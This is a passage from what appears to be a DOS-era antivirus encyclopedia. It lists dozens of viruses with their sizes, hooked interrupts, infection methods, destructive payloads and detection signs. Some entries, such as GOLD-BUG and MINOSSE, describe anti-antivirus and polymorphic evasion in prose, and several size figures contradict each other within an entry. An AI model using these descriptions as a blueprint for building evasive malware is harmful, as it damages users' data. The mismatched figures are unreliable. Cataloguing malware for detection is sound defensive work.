  11349. Execution Procedure: Searches for an uninfected EXE file on the current
  11350. directory in A, B or C, then proceeds to infect it. It only infects one
  11351. file at a time.
  11352.  
  11353. Damage: None
  11354.  
  11355. Note:
  11356. 1) Does not stay in the memory.
  11357. 2) An error message appears when writing because INT 24h has not been
  11358.    hanged.
  11359. 3) This virus was written using an advanced programming language.
  11360.  
  11361. Detection method: Infected files increase by 15395 bytes.
  11362.  
  11363. [Pa-5220]
  11364. Virus Name: Pa-5220
  11365. Virus Type: File Virus (EXE and COM files)
  11366. Virus Length:
  11367.  
  11368. Execution Procedure: Searches for an uninfected COM or EXE file on the
  11369. current directory in A, B or C, then infects it. It only infects one
  11370. file at a time.
  11371.  
  11372. Damage: It overwrites the original files with the virus code, thus
  11373. corrupting the files.
  11374.  
  11375. Note:
  11376. 1) Does not stay in the memory.
  11377. 2) An error message appears when writing because INT 24h has not been
  11378.    hanged.
  11379. 3) This virus was written using an advanced programming language.
  11380.  
  11381. [PCBB-11]
  11382. Virus Name: Pcbb11
  11383. Virus Type: File Virus (EXE and COM files)
  11384. Virus Length: 3052 bytes
  11385. PC Vectors Hooked: INT 21h, INT 24h
  11386.  
  11387. Execution Procedure:
  11388. 1) Checks whether it is memory resident. If not, it loads itself
  11389.     resident in the high memory.
  11390. 2) Hooks INT 21h and goes back to the original routine.
  11391.  
  11392. Infection Procedure:
  11393. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11394.     prevent divulging its trace when writing. If the program to be
  11395.     executed is an uninfected COM or EXE file, the virus proceeds to
  11396.     infect it.
  11397.  
  11398. Damage:
  11399.  
  11400. Detection method: Infected files increase by 3052 bytes.
  11401.  
  11402. [Bow]
  11403. Virus Name: Bow
  11404. Virus Type: File Virus (EXE and COM files)
  11405. Virus Length:  5856 bytes
  11406.  
  11407. PC Vectors Hooked: INT 21h
  11408.  
  11409. Execution Procedure:
  11410. 1) Checks whether it is memory resident. If not, it loads itself
  11411.    resident in the high memory.
  11412. 2) Hooks INT 21h and goes back to the original routine.
  11413.  
  11414. Infection Procedure:
  11415. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  11416.    is an uninfected COM or EXE file, the virus proceeds to infect it.
  11417.  
  11418. Damage: None
  11419.  
  11420. Note:
  11421. 1) An error message appears when writing because INT 24h has not been
  11422.    hanged.
  11423. 2) This virus was written using an advanced programming language.
  11424.  
  11425. Detection Method: Infected files increase by 5856 bytes.
  11426.  
  11427. [PCBB-3072]
  11428. Virus Name: Pcbb3072
  11429. Virus Type: File Virus (EXE and COM files)
  11430. Virus Length: 3,072 bytes
  11431. PC vectors Hooked: INT 21h, INT 24h
  11432.  
  11433. Execution Procedure:
  11434. 1) Checks whether it is memory resident. If not, it loads itself
  11435.     resident in the high memory.
  11436. 2) Hooks INT 21h and goes back to the original routine.
  11437.  
  11438. Infection Procedure:
  11439. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11440.     prevent divulging its trace when writing. If the program to be
  11441.     executed is an uninfected COM or EXE file, the virus proceeds
  11442.     to infect it.
  11443.  
  11444. Damage:
  11445.  
  11446. Detection Method: Infected files increase by 3072 bytes.
  11447.  
  11448. [Terminal]
  11449. Virus Name: Terminal
  11450. Virus Type: File Virus (EXE and COM files)
  11451. Virus Length:
  11452.  
  11453. Execution Procedure: Searches for an uninfected EXE file on
  11454. the current directory in C, then infects it.
  11455.  
  11456. Damage: It overwrites the original files with the virus code, thus
  11457. corrupting the files.
  11458.  
  11459. Note:
  11460. 1) Does not stay in the memory.
  11461. 2) An error message appears when writing because INT 24h has not been
  11462.    hanged.
  11463. 3) This virus was written using an advanced programming language.
  11464. 4) This virus is encrypted by a program like PKLITE. Although it
  11465.    has a pattern, we were not able to scan it.
  11466.  
  11467. [Lanc]
  11468. Virus Name: Lanc
  11469. Virus Type: File Virus (EXE files)
  11470. Virus Length: 7,376 bytes
  11471.  
  11472. Execution Procedure:
  11473. 1) Searches for an uninfected EXE file on the current directory.
  11474. 2) Creates a new COM file with the same file name as the original EXE
  11475.     file. This new COM file contains the virus.
  11476.  
  11477. Damage: None
  11478.  
  11479. Note:
  11480. 1) Does not stay in the memory.
  11481. 2) An error message appears when writing because INT 24h has not been
  11482.     hanged.
  11483. 3) This virus was written using an advanced programming language.
  11484.  
  11485. Detection method: Check whether the file length is 7376 bytes.
  11486.  
  11487. [Nazi-Phobia]
  11488. Virus Name: Nazi-Phobia
  11489. Virus Type: File Virus (EXE files)
  11490. Virus Length:
  11491.  
  11492. Execution Procedure: Searches for an uninfected EXE file on the
  11493. current directory, then infects it. It only infects one file at a
  11494. time.
  11495.  
  11496. Damage: It overwrites the original files with the virus code, thus
  11497. corrupting the files.
  11498.  
  11499. Note:
  11500. 1) Does not stay in the memory.
  11501. 2) An error message appears when writing because INT 24h has not been
  11502.    hanged.
  11503. 3) This virus was written using an advanced programming language.
  11504.  
  11505. [Animus]
  11506. Virus Name: Animus
  11507. Virus Type: File Virus (COM and EXE files)
  11508. Virus Length: 7,360 or 7,392 bytes
  11509.  
  11510. Execution Procedure: Searches for an uninfected COM or EXE file on the
  11511. current directory, then infects it. It only infects two or three files
  11512. at a time.
  11513.  
  11514. Damage: None
  11515.  
  11516. Note:
  11517. 1) Does not stay in the memory.
  11518. 2) An error message appears when writing because INT 24h has not been
  11519.    hanged.
  11520. 3) This virus was written using an advanced programming language.
  11521.  
  11522. Detection method: Infected files increase by 7360 or 7392 bytes.
  11523.  
  11524. [Hitler]
  11525. Virus Name: Hitler
  11526. Virus Type: File Virus (COM files)
  11527. Virus Length:  4,808 bytes
  11528.  
  11529. PC Vectors Hooked: INT 21h, INT 24h
  11530.  
  11531. Execution Procedure:
  11532. 1) Checks whether it is memory resident. If not, it loads itself
  11533.    resident in the high memory.
  11534. 2) Hooks INT 21h and goes back to the original routine.
  11535.  
  11536. Infection Procedure:
  11537. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11538.    prevent divulging its trace when writing. If the program to be
  11539.    executed is an uninfected COM file, the virus proceeds to infect it.
  11540.  
  11541. Damage: None
  11542.  
  11543. Detection method: Infected files increase by 4808 bytes.
  11544.  
  11545. [Hellwean-1182]
  11546. Virus Name: Hellwean1182
  11547. Virus Type: File Virus (EXE and COM files)
  11548. Virus Length:  1182 bytes
  11549.  
  11550. PC Vectors Hooked: INT 21h, INT 24h
  11551.  
  11552. Execution Procedure:
  11553. 1) Checks whether it is memory resident. If not, it loads itself
  11554.    resident in the high memory.
  11555. 2) Hooks INT 21h and goes back to the original routine.
  11556.  
  11557. Infection Procedure:
  11558. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11559.    prevent divulging its trace when writing. If the program to be
  11560.    executed is an uninfected COM or EXE file, the virus proceeds to
  11561.    infect it.
  11562.  
  11563. Damage: None
  11564.  
  11565. Detection method: Infected files increase by 1182 bytes.
  11566.  
  11567. [Minsk-GH]
  11568. Virus Name: Minsk-Gh
  11569. Virus Type: File Virus (EXE and COM files)
  11570. Virus Length:  1450-1490 bytes
  11571.  
  11572. PC Vectors Hooked: INT 21h, INT 24h
  11573.  
  11574. Execution Procedure:
  11575. 1) Checks whether it is memory resident. If not, it loads itself
  11576.    resident in the high memory.
  11577. 2) Hooks INT 21h and goes back to the original routine.
  11578.  
  11579. Infection Procedure:
  11580. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11581.    prevent divulging its trace when writing. If the program to be
  11582.    executed is an uninfected COM or EXE file, the virus proceeds to
  11583.    infect it.
  11584.  
  11585. Damage: None
  11586.  
  11587. Note: This virus cannot run on DOS 5.0.
  11588.  
  11589. Detection method: Infected files increase by 1450-1490 bytes.
  11590.  
  11591. [LV]
  11592. Virus Name: Lv
  11593. Virus Type: File Virus (COM files)
  11594. Virus Length:
  11595. PC Vectors Hooked: INT 21h, INT 24h
  11596.  
  11597. Execution Procedure:
  11598. 1) Checks whether it is memory resident. If not, it loads itself
  11599.     resident in the high memory.
  11600. 2) Hooks INT 21h and then checks whether COMMAND.COM that booted up the
  11601.     system is infected or not. If not, the virus infects it and returns
  11602.     to the original routine.
  11603.  
  11604. Infection Procedure:
  11605. 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to
  11606.     prevent divulging its trace when writing. If the program to be
  11607.     executed is an uninfected COM file, the virus proceeds to infect
  11608.     it.
  11609.  
  11610. Damage: It overwrites the original files with the virus code, thus
  11611. corrupting the files.
  11612.  
  11613. [Mini-207]
  11614. Virus Name: Mini-207
  11615. Virus Type: File Virus (COM files)
  11616. Virus Length:  207 bytes
  11617.  
  11618. Execution Procedure: Searches for all uninfected COM files on the
  11619. current directory, then infects them.
  11620.  
  11621. Note:
  11622. 1) Does not stay in the memory.
  11623. 2) An error message appears when writing because INT 24h has not been
  11624.    hanged.
  11625.  
  11626. Damage: It overwrites the original files with the virus code, thus
  11627. corrupting the files.
  11628.  
  11629. [Brother_300]
  11630. Virus Name: Brother_300
  11631. Virus Type: File Virus (EXE files)
  11632. Virus Length:  300 bytes
  11633. PC Vectors Hooked: INT 21h, INT 24h
  11634.  
  11635. Execution Procedure:
  11636. 1) Checks whether it is memory resident. If not, it loads itself
  11637.     resident in the high memory.
  11638. 2) Hooks INT 21h and goes back to the original routine.
  11639.  
  11640. Infection Procedure:
  11641. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11642.     prevent divulging its trace when writing. If the program to be
  11643.     executed is an uninfected EXE file, it creates a new COM file
  11644.     with the same name as the EXE file. This new COM file contains
  11645.     the virus. Its length is 300 bytes.
  11646.  
  11647. Damage: None
  11648.  
  11649. Detection method: Checks whether the file's length is 300 bytes.
  11650.  
  11651. [Lip-286]
  11652. Virus Name: Lip-286
  11653. Virus Type: File Virus (COM files)
  11654. Virus Length: 286 bytes
  11655.  
  11656. Execution Procedure: Searches for an uninfected COM file on the
  11657. current directory, then infects it. It infects two or three files at
  11658. a time.
  11659.  
  11660. Damage: There is a flag in the virus procedure (every infected file
  11661. has a different flag). The flag decreases by 1 every time the virus
  11662. infects a file. When the flag reaches zero, the virus will destroy
  11663. all data on the hard disk.
  11664.  
  11665. Note:
  11666. 1) Does not stay in the memory.
  11667. 2) An error message appears when writing because INT 24h has not been
  11668.    hanged.
  11669.  
  11670. Detection method: Infected files increase by 286 bytes.
  11671.  
  11672. [Gomb]
  11673. Virus Name: Gomb
  11674. Virus Type: File Virus (COM files)
  11675. Virus Length:  4093 bytes
  11676.  
  11677. PC Vectors Hooked: INT 21h
  11678.  
  11679. Execution Procedure:
  11680. 1) Checks whether it is memory resident. If not, it loads itself
  11681.    resident in the high memory.
  11682. 2) Hooks INT 21h and goes back to the original routine.
  11683.  
  11684. Infection Procedure:
  11685. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  11686.    is an uninfected COM file, the virus proceeds to infect it.
  11687.  
  11688. Damage: None
  11689.  
  11690. Detection method: Infected files increase by 4093 bytes.
  11691.  
  11692. [Bert]
  11693. Virus Name: Bert
  11694. Virus Type: File Virus (COM and EXE files)
  11695. Virus Length:  2294 bytes
  11696.  
  11697. PC Vectors Hooked: INT 21h
  11698.  
  11699. Execution Procedure:
  11700. 1) Checks whether it is memory resident. If not, it loads itself
  11701.    resident in the high memory.
  11702. 2) Hooks INT 21h and goes back to the original routine.
  11703.  
  11704. Infection Procedure:
  11705. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  11706.    is an uninfected COM or EXE file, the virus proceeds to infect it.
  11707.  
  11708. Damage: None
  11709.  
  11710. Detection method: Infected files increase by 2294 bytes.
  11711.  
  11712. [Triple Shot]
  11713. Virus Name: Triple-shot
  11714. Virus Type: File Virus (EXE files)
  11715. Virus Length: 6610
  11716.  
  11717. Execution Procedure: Searches for an uninfected EXE file on the
  11718. current directory. Then creates a new hidden COM file with the
  11719. same name as the EXE file. This new COM file is the virus. Its
  11720. length is 6610 bytes.
  11721.  
  11722. Damage: None
  11723.  
  11724. Note:
  11725. 1) Does not stay in the memory.
  11726. 2) An error message appears when writing because INT 24h has not been
  11727.    hanged.
  11728.  
  11729. Detection method: Check whether the file's length is 6610 bytes.
  11730.  
  11731. [Fame]
  11732. Virus Name: Fame
  11733. Virus Type: File Virus (EXE files)
  11734. Virus Length:  896 bytes
  11735.  
  11736. PC Vectors Hooked: INT 21h, INT 24h
  11737.  
  11738. Execution Procedure:
  11739. 1) Checks whether it is memory resident. If not, it loads itself
  11740.    resident in the high memory.
  11741. 2) Hooks INT 21h and goes back to the original routine.
  11742.  
  11743. Infection Procedure:
  11744. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11745.    prevent divulging its trace when writing. If the program to be
  11746.    executed is an uninfected EXE file, the virus proceeds to infect it.
  11747.  
  11748. Damage: None
  11749.  
  11750. Detection method: Infected files increase by 896 bytes.
  11751.  
  11752. [CCCP]
  11753. Virus Name: Cccp
  11754. Virus Type: File Virus (COM files)
  11755. Virus Length: 510 bytes
  11756.  
  11757. Execution Procedure: Searches for an uninfected COM file on the
  11758. current directory, then infects it. It infects two or three files at
  11759. a time.
  11760.  
  11761. Damage: There is a flag (valued 0 to 25) in the virus procedure
  11762. (every infected file has a different flag). When an infected file
  11763. with flag of 25 is executed, the virus will destroy all data on the
  11764. hard disk.
  11765.  
  11766. Note:
  11767. 1) Does not stay in the memory.
  11768. 2) An error message appears when writing because INT 24h has not been
  11769.    hanged.
  11770.  
  11771. Detection method: Infected files increase by 510 bytes.
  11772.  
  11773. [L1]
  11774. Virus Name: L1
  11775. Virus Type: File Virus (COM files)
  11776. Virus Length:  140 bytes
  11777.  
  11778. PC Vectors Hooked: INT 21h
  11779.  
  11780. Execution Procedure:
  11781. 1) Checks whether it is memory resident. If not, it loads itself
  11782.    resident in the high memory.
  11783. 2) Hooks INT 21h and goes back to the original routine.
  11784.  
  11785. Infection Procedure:
  11786. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  11787.    is an uninfected COM file, the virus proceeds to infect it.
  11788.  
  11789. Damage: None
  11790.  
  11791. Note: An error message appears when writing because INT 24h has not been
  11792. hanged.
  11793.  
  11794. Detection method: Infected files increase by 140 bytes.
  11795.  
  11796. [Crepate]
  11797. Virus Name: Crepate
  11798. Virus Type: File Virus
  11799.             Virus infects .COM between 400 and 62000 bytes,
  11800.             .EXE shorter than 589824 bytes. Virus is Memory Block
  11801.             Resident.
  11802. Virus Length:  2910 bytes (file), 4K bytes (memory).
  11803. Interrupt Vectors Hooked: INT 21h
  11804.  
  11805. Infection Process: Every infected file becomes 2910 bytes longer,
  11806. with the virus code at the end and some kind of a header created
  11807. by the virus. The second group of bytes indicating the time of
  11808. creation of the file, is set to 31 (1Fh). Every subsequent file
  11809. infection, the virus resets the system memory from address 0:413
  11810. to 280h (640 K).
  11811.  
  11812. Damage:  Virus formats the hard disk.
  11813.  
  11814. Symptoms: Loss of data stored in the last 7 sectors of the diskette,
  11815. loss of data stored in the last cylinder, first side, first 7 sectors,
  11816. increased file size.
  11817.  
  11818. Note: This virus doesn't infect files named as : "*AN.???" or
  11819. "*LD.???" To recognize the virus presence in the boot sector one
  11820. can look for:
  11821. - a byte valued FFh in the offset 4 in floppy disks.
  11822. - a word valued 2128h in the offset 4 in hard disks.
  11823.  
  11824. Furthermore, at the end of each infected file, a text string can
  11825. be found:
  11826.  
  11827.     "Crepa (C) bye R.T.".
  11828.  
  11829. This text can be easily modified. The DOS Chkdsk command, when
  11830. the virus is resident, reveals a decrease of 4K bytes in the available
  11831. memory.
  11832.  
  11833. [Die Lamer]
  11834. Virus Name: DIE LAMER
  11835. Virus Type: Resident at the top of the MCB (Memory Control
  11836.             Block).
  11837. Virus Length: 1,136 bytes
  11838.  
  11839. Interrupt Vectors Hooked: INT 21h
  11840.  
  11841. Infection Process:
  11842. This virus is spread by executing an infected program. When a DIE
  11843. LAMER infected program is executed, it will first check to see if
  11844. it is already resident in the memory by checking if address 0:4f2h
  11845. contains the value 3232h. If it is already in the memory it will
  11846. execute the infected program. If not, it will perform the following
  11847. functions:
  11848.  
  11849. Damage: Loss of some data stored in the floppy.
  11850.  
  11851. Symptoms: Garbage in floppy disk. Increased file sizes. Screen
  11852. displays:
  11853.  
  11854.           "-=*@DIE_LAMER@*=-."
  11855.  
  11856. Note: The method used by the virus is very dangerous, because if
  11857. an anti-virus program catches this virus in the memory and displays
  11858. the message: "found '-=*@DIE_LAMER@*=-' in memory", the virus
  11859. will only write garbage to the floppy, but the virus program can be
  11860. easily modified to execute more destructive routines (such as
  11861. formatting the hard disk, etc...).
  11862.  
  11863. [FaxFree]
  11864. Virus Name: FAXFREE
  11865. Virus Type: File Virus
  11866.             Virus infects .COM and .EXE files as long as they are
  11867.             longer than 32 bytes, and shorter than 131,072
  11868.             bytes. Infects Partition record. File Virus.
  11869. Virus Length: 3 Kb
  11870.  
  11871. PC Vectors Hooked: INT 21h
  11872.  
  11873. Infection Process: This virus can be spread by executing an
  11874. infected program or from booting the system with an infected
  11875. disk. There are several methods of infection. When an infected
  11876. program is executed in a clean system, the virus first removes
  11877. the contents of the original partition sector of the hard disk to
  11878. the last sector of the last side of the last cylinder.  Then the
  11879. virus will copy itself in the last side of the last cylinder,
  11880. beginning from the 9th last sector to the 6th last sector.  These
  11881. sectors are not marked as "bad sectors" and get overwritten by
  11882. the virus, with no regards for their previous contents.
  11883.  
  11884. Damage: Hangs the system.  Infected files will increase in length by
  11885. 2048 bytes, with the virus code file infection.
  11886.  
  11887. Symptoms: When the virus wants to replace the original partition
  11888. sector, it needs to decrypt some data which after decryption
  11889. shows the following text strings :
  11890.  
  11891.     "PISello tenere fuori dalla portata dei bambini.
  11892.     PaxTibiQuiLegis.FaxFree!!"
  11893.  
  11894. Note: This virus doesn't infect files named as : "*AN.???" ,
  11895. "*OT.???" or "*ND.???" If the system date is between the 25th and
  11896. 30th of April, the virus will hang the system. The virus uses a
  11897. smart technique to avoid anti-virus detection programs, when
  11898. modifying the partition sector that is hooking int 01h, it will
  11899. turn on a single step flag to get the original entry of DOS
  11900. hooked.  The virus will then move itself to the top of the MCB
  11901. (Memory Control Block), and decrease available memory in the MCB
  11902. by 3Kb.  It will hook Int 13h and Int 21h and then run the
  11903. original program.
  11904.  
  11905. [Ghost Player]
  11906. Virus Name: GHOST PLAYER
  11907. Virus Type: File Virus (EXE files), Memory Block Resident
  11908. Virus Length: 1,200 bytes
  11909.  
  11910. PC Vectors Hooked: INT 21h
  11911.  
  11912. Infection Process: This virus is spread by executing an infected
  11913. program. When a GHOST PLAYER infected program is executed, if DOS
  11914. version is greater than 3 and the serial number of default disk
  11915. equals zero, virus will execute the infected program. Otherwise
  11916. virus performs the following functions: virus stays resident at
  11917. the top of the MCB (memory control block)  but below the DOS 640k
  11918. boundary. The available free memory will decrease by 1200 (4B0H)
  11919. bytes.
  11920.  
  11921. Damage:  Virus increases file lengths.
  11922.  
  11923. Symptoms: Decreased available memory. If a random value is equal
  11924. to FF00, the virus displays the following message: " !  Bumpy"
  11925. Furthermore, the screen shakes up and down.
  11926.  
  11927. Note: The virus doesn't infect files named as : "TB*.???" , "F-*.???"
  11928. , "CP*.???" , "NA*.???" , "SC*.???" "CL*.???" or "V*.???".
  11929.  
  11930. [Gold Bug]
  11931. Virus Name: GOLD-BUG
  11932. Virus Type: Spawning Color Video Resident and Extended HMA Memory
  11933.             Resident Boot-Sector and Master-Sector Infector
  11934. Virus Length: 1,024 Bytes
  11935.  
  11936. Interrupt Vectors Hooked: INT 21h, INT 13h
  11937.  
  11938. Infection Process: GOLD-BUG is a memory-resident multipartite
  11939. polymorphic stealthing boot-sector spawning anti-antivirus virus
  11940. that works with DOS 5 and DOS 6 in the HIMEM.SYS memory.  When an
  11941. .EXE program infected with the GOLD-BUG virus is run, it
  11942. determines if it is running on an 80186 or better, if not it will
  11943. terminate and not install. If it is on an 80186 or better it will
  11944. copy itself to the partition table of the hard disk and remain
  11945. resident in memory in the HMA (High Memory Area) only if the HMA
  11946. is available, i.e., DOS=HIGH in the CONFIG.SYS file else no
  11947. infection will occur. The old partition table is moved to sector
  11948. 14 and the remainder of the virus code is copied to sector 13.
  11949. The virus then executes the spawned associated file if present.
  11950. INT 13 and INT 2F are hooked into at this time but not INT 21.
  11951. The spawning feature of this virus is not active now.
  11952.  
  11953. Damage: The GOLD-BUG virus also has an extensive anti-antivirus
  11954. routine.  It writes to the disk using the original BIOS INT 13
  11955. and not the INT 13 chain that these types of programs have hooked
  11956. into.  It hooks into the bottom of the interrupt chain rather
  11957. than changing and hooking interrupts. If the GOLD-BUG virus is
  11958. resident in memory, any attempts to run most virus scanners will
  11959. be aborted. GOLD-BUG stops any large .EXE file (greater than 64k)
  11960. with the last two letters of "AN" to "AZ".  It will stop
  11961. SCAN.EXE, CLEAN.EXE, NETSCAN.EXE, CPAV.EXE, MSAV.EXE,
  11962. TNTAV.EXE, and so on. The SCAN program will either be deleted or
  11963. an execution error will return.  Also, GOLD-BUG will cause a CMOS
  11964. checksum failure to happen the next time the system boots up. GOLD-BUG
  11965. also erases "CHKLIST.???" created by CPAV.EXE and MSAV.EXE.
  11966. Programs that do an internal checksum on themselves will not
  11967. detect any changes.
  11968.  
  11969. Symptoms: CMOS checksum failure.  Creates files with no
  11970. extension; Modem answers on 7th ring.  Most virus scanners fail
  11971. to run or are Deleted. And CHKLIST.??? files are deleted.
  11972.  
  11973. Note: The GOLD-BUG virus is also Polymorphic. Each .EXE file it
  11974. creates only has 2 bytes that remain constant. It can mutate
  11975. into 128 different decryption patterns. It uses a double
  11976. decryption technique that involves INT 3 that makes it very
  11977. difficult to decrypt using a debugger.  The assembly code allowed
  11978. for 512 different front-end decryptors. Each of these can mutate
  11979. 128 different ways.
  11980.  
  11981. [Invisible Man]
  11982. Virus Name: INVISIBLE MAN
  11983. Virus Type: File Virus (COM and EXE files), Partition,
  11984.             Boot record, Memory Block Resident
  11985. Virus Length: 2926 Bytes (file), D80h Bytes (memory)
  11986.  
  11987. Interrupt Vectors Hooked:  INT 21h
  11988.  
  11989. Infection Process:
  11990. This virus can spread by executing an infected program or by
  11991. booting the system from an infected disk. There are several
  11992. different methods of infection:
  11993.  
  11994. (1). When an INVISIBLE MAN infected program is executed it will;
  11995.  
  11996.       A. Infect the hard disk partition table :
  11997.      (i) Write the virus body to the last 7 sectors of the active
  11998.          hard disk.
  11999.     (ii) The ending location of the active hard disk will be
  12000.          decreased by 7 sectors.
  12001.    (iii) Write the virus loader to the partition sector. This
  12002.          sector will be encrypted.
  12003.  
  12004.       B. Modify the boot sector:
  12005.       It will change the total sector numbers message, which will
  12006.       be seven less than the original figure.
  12007.  
  12008. Damage: The virus displays a message and plays music on the system
  12009. speaker.
  12010.  
  12011. Symptoms:
  12012. Loss of data stored in the last 7 sectors of the hard disk;
  12013. increased file sizes. File sizes increase by 2926 bytes.  Virus
  12014. displays the following message:
  12015.  
  12016.     "I'm the invisible man, I'm the invisible man Incredible how
  12017.      you can See right through me."
  12018.  
  12019. Virus also plays music on the system speaker.
  12020.  
  12021. [Junkie]
  12022. Virus Name: Junkie
  12023. Virus Type: Memory-Resident Multipartite
  12024. Virus Length:  512 bytes
  12025.  
  12026. Interrupt Vectors Hooked: INT 21h
  12027.  
  12028. Infection Process:
  12029. Once a virus-infected program is run, the virus installs itself
  12030. in the memory as a terminate-and-stay-resident program. On the
  12031. system area of the hard disk, the virus copies two 512-byte
  12032. sectors of code into the first track of the hard disk. The virus
  12033. then modifies the existing master boot record of the hard disk to
  12034. read the extra sectors and execute them upon boot-up.
  12035.  
  12036. Damage:  Virus adds approx. 1,024 bytes of virus code at the end
  12037. of infected files.
  12038.  
  12039. [March 25th]
  12040. Virus Name: March-25th
  12041. Virus Type: File Virus (EXE and COM files). The MARCH-25H
  12042.             virus will infect .COM and .EXE files which are
  12043.             shorter than 196608 Bytes in length.
  12044. Virus Length: 1056 Bytes
  12045.  
  12046. Interrupt Vectors Hooked: INT 21h
  12047.  
  12048. Infection Process:
  12049. This virus is spread by executing an infected program. When a
  12050. MARCH-25H infected program is executed, it will check to see if
  12051. it is already resident in the memory by checking if address 0:212h
  12052. contains the value F100h. If it is already in the memory it will
  12053. execute the infected program. Virus stays resident at the top of
  12054. the MCB (memory control block) but below the DOS 640k boundary.
  12055. The available free memory will decrease by 1056 (420H) bytes.
  12056. It will infect .EXE and .COM programs when they are executed from
  12057. the hard disk.
  12058.  
  12059. Damage:
  12060. The virus destroys the hard disk. Infected files will have a file
  12061. length increase of 1025 - 1040 (401h - 410h) bytes with the virus being
  12062. located at the end of the file.
  12063.  
  12064. Symptoms: Virus causes data loss on the C drive.
  12065.  
  12066. Note:
  12067. If the system date is March 25 of any year, the virus will proceed to
  12068. write garbage to:
  12069. C drive sector 0 - 6 , cylinder 0 , head 0
  12070. C drive sector 1 - 7 , cylinder 1 , head 0
  12071. C drive sector 1 - 7 , cylinder 2 , head 0."
  12072.  
  12073. [Minosse]
  12074. Virus Name: MINOSSE
  12075. Virus Type: File Virus (EXE files), MBR
  12076. Virus Length: 5772 bytes
  12077.  
  12078. PC Vectors Hooked: INT 21h
  12079.  
  12080. Infection Process:
  12081. MINOSSE is a polymorphic virus which prevents the Debug.exe
  12082. program from tracing this virus. When a MINOSSE infected program
  12083. is executed, it will;
  12084. 1. Hook int 8xh - int 9xh:  (x:any number) First, it will hook
  12085.    int 8xh - 9xh, and then it will run this interrupt to get into
  12086.    virus entry and decrypt the virus body.
  12087. 2. Stay resident at the top of MCB (memory control block) but
  12088.    below the 640k DOS boundary.
  12089.  
  12090. Damage:
  12091. Virus will hang the system when the system date is greater than June
  12092. and the day is the 25th. Infected programs will have a file
  12093. length increase of 3075 bytes with the virus being located at the
  12094. end of the file. The available free memory will decrease by 5772 bytes.
  12095.  
  12096. Symptoms: Decreased available memory. Virus will display the
  12097. following message,
  12098.  
  12099.     "Minose 1V5 (c) 93 WilliWonka."
  12100.  
  12101. Note:
  12102. This virus is a polymorphic and also a very smart virus. It is
  12103. not easy to detect using scan programs because it doesn't have
  12104. the same code for scanning, and it is not easy to find using the
  12105. interrupt vectors because it recovers int 21h to the original vector.
  12106.  
  12107. [Mombasa]
  12108. Virus Name: MOMBASA
  12109. Virus Type: File Virus (COM files)
  12110. Virus Length: 3584 bytes
  12111.  
  12112. PC Vectors Hooked:  INT 21h, INT 08h
  12113.  
  12114. Infection Process:
  12115. MOMBASA is a polymorphic virus and uses INT 01h and INT 03h to
  12116. prevent tracing this virus.  When a MOMBASA infected program is
  12117. executed, it will; Stay resident at the top of MCB (memory
  12118. control block) but below the 640k DOS boundary. The available
  12119. free memory will decrease by 3584 bytes. It will hook int
  12120. 08h to detect if int 21h is changed by another program. If the
  12121. INT 21h vector is changed, the virus will change it's vector to
  12122. the new INT 21h vector and will hook its vector to int 21h again.
  12123. It will infect .COM programs and try to infect C:\COMMAND.COM
  12124. when they are executed.  When MOMBASA is memory resident it will
  12125. hide the file size change because the virus recovers the original
  12126. file length.  When creating a directory, removing a directory,
  12127. or selecting a default drive such as A: or B:, the virus writes some
  12128. data onto the disk/diskette, but without success.
  12129.  
  12130. Damage:
  12131. Screen slowly fades until completely blank.  The system then
  12132. proceeds to hang. Virus destroys the boot sector and FAT of the hard
  12133. drive. Infected programs will have a file length increase of 3568
  12134. bytes with the virus being located at the end of the file.
  12135.  
  12136. Symptoms: Virus displays the following message:
  12137.  
  12138.     "I'm gonna die...Attack radical...Mombosa virus (MM 92')."
  12139.  
  12140. [NOV-17-768]
  12141. Virus Name: NOV-17-768
  12142. Virus Type: File Virus (COM files shorter than 59920 Bytes, EXE)
  12143. Virus Length: 768 Bytes (file), 800 Bytes (memory)
  12144.  
  12145. PC Vectors Hooked: INT 21h
  12146.  
  12147. Infection Process: This virus is a variant of the November-17th
  12148. virus. The November 17th virus was detected in January, 1992. Its
  12149. origin or point of original isolation was originally unknown, but
  12150. it has since been reported as being widespread in Rome, Italy,
  12151. during the month of December, 1991. November 17th is a memory
  12152. resident infector of .COM and .EXE programs, including
  12153. COMMAND.COM. The first time a program infected with November 17th
  12154. is executed, the virus will install itself memory resident at the
  12155. top of the system memory but below the 640K DOS boundary.
  12156.  
  12157. Damage:
  12158. Virus destroys current disk from sector 1 to sector 8. Total
  12159. system and available free memory, as indicated by the DOS CHKDSK
  12160. program, will decrease by 896 bytes.  Interrupt 12's return will
  12161. not have been moved. Interrupts 09 and 21 will be hooked.
  12162.  
  12163. Symptoms: Infected programs will have a file length increase of
  12164. 855 bytes with the virus being located at the end of the infected
  12165. file. There will be no visible change to the file's date and time
  12166. in a DOS disk directory listing
  12167.  
  12168. Note:
  12169.  
  12170. [NOV-17-800]
  12171. Virus Name: NOV-17-800
  12172. Virus Type: File Virus (COM and EXE files), Memory Block
  12173.             Resident. Virus does not infect "SCAN", "CLEAN."
  12174. Virus Length: 800 bytes (file), 832 bytes (memory)
  12175.  
  12176. PC Vectors Hooked: INT 09h and 21h
  12177.  
  12178. Infection Process:
  12179. The first time a program infected with November 17th is executed,
  12180. the virus will install itself memory resident at the top of the
  12181. system memory but below the 640K DOS boundary.
  12182.  
  12183. Damage: Virus destroys the hard disk's FAT. When the value of [00:46E]
  12184. is changed and the month = 1, the virus will then write garbage
  12185. onto the current disk from sectors 1 to 8.
  12186.  
  12187. Symptoms: File sizes increase by 800 bytes. Decreased available
  12188. memory by 800 bytes.
  12189.  
  12190. [Protovir]
  12191. Virus Name: PROTOVIR
  12192. Virus Type: File Virus (COM files), resides in HiMem
  12193. Virus Length: 730 bytes (file), 270 bytes (memory)
  12194.  
  12195. PC Vectors Hooked: INT 21h
  12196.  
  12197. Infection Process:
